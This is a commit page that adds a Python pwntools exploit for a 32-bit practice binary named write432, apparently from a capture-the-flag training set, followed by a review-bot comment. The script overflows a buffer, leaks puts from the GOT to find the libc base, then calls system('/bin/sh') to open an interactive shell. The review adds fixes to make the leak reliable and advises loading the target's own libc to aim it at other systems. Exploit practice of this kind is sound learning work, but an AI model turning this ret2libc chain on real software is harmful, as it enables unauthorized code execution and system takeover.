
exploit for 32-bit write4 binary
AravGarg authored Mar 28, 2020
1 parent ddccc73 commit fbf1c74
Showing 1 changed file with 36 additions and 0 deletions.
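--- a/write432.py
+++ b/write432.py
@@ -0,0 +1,36 @@
+from pwn import *
+target=process('./write432')
+elf=ELF('write432')
+libc=elf.libc
+print(target.recvuntil("already!\n> "))
+payload="A"*44
+
+puts_plt=0x08048420
+puts_got=0x0804a014
+pwnme=0x080485f6
+popret=0x080486db
+
+payload+=p32(puts_plt)
+payload+=p32(popret)
+payload+=p32(puts_got)
+payload+=p32(pwnme)
+payload+=p32(0x0)
+
+target.sendline(payload)
+leak=target.recv()[0:4]
+#leak=target.recvuntil("\x0a").strip("\x0a")
+libc_puts=u32(leak+"\x00"*(4-len(leak)))
+libc_base=libc_puts-libc.symbols["puts"]
+print(hex(libc_base))
+libc_system=libc_base+libc.symbols["system"]
+libc_binsh=libc_base+libc.search("/bin/sh\x00").next()
+
+payload="A"*44
+
+payload+=p32(libc_system)
+payload+=p32(0xdeadbeef)
+payload+=p32(libc_binsh)
+
+target.sendline(payload)
+target.interactive()
+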
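Review bot: The libc leak on the `leak=target.recv()[0:4]` line is whatever happens to be buffered at that instant, so a short or early read (puts stops at the first NUL byte and appends "\n", which is what the zero-padding on the `u32(...)` line works around) silently yields a wrong `libc_base` that is only noticed when the second stage crashes; add a sanity check right after `libc_base` is computed, `assert libc_base & 0xfff == 0, "bad leak: " + hex(libc_base)`, so a bad leak fails loudly before `system` is fired. The `puts`/`system`/`"/bin/sh"` offsets come from `elf.libc`, i.e. the libc the local loader picked for `./write432`, so against any other target that line must point at the target's libc build (`libc = ELF("./libc-target.so")`) or every derived address is off. The hard-coded `puts_plt`, `puts_got`, `pwnme` and `popret` values presumably assume the binary is not PIE; a one-line comment stating that and where they came from (e.g. `objdump -d` / `ROPgadget`) would spare the next reader a re-derivation. `libc.search("/bin/sh\x00").next()` and the `str` payloads are Python 2 only; `next(libc.search(b"/bin/sh\x00"))` with `bytes` payloads works on both.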
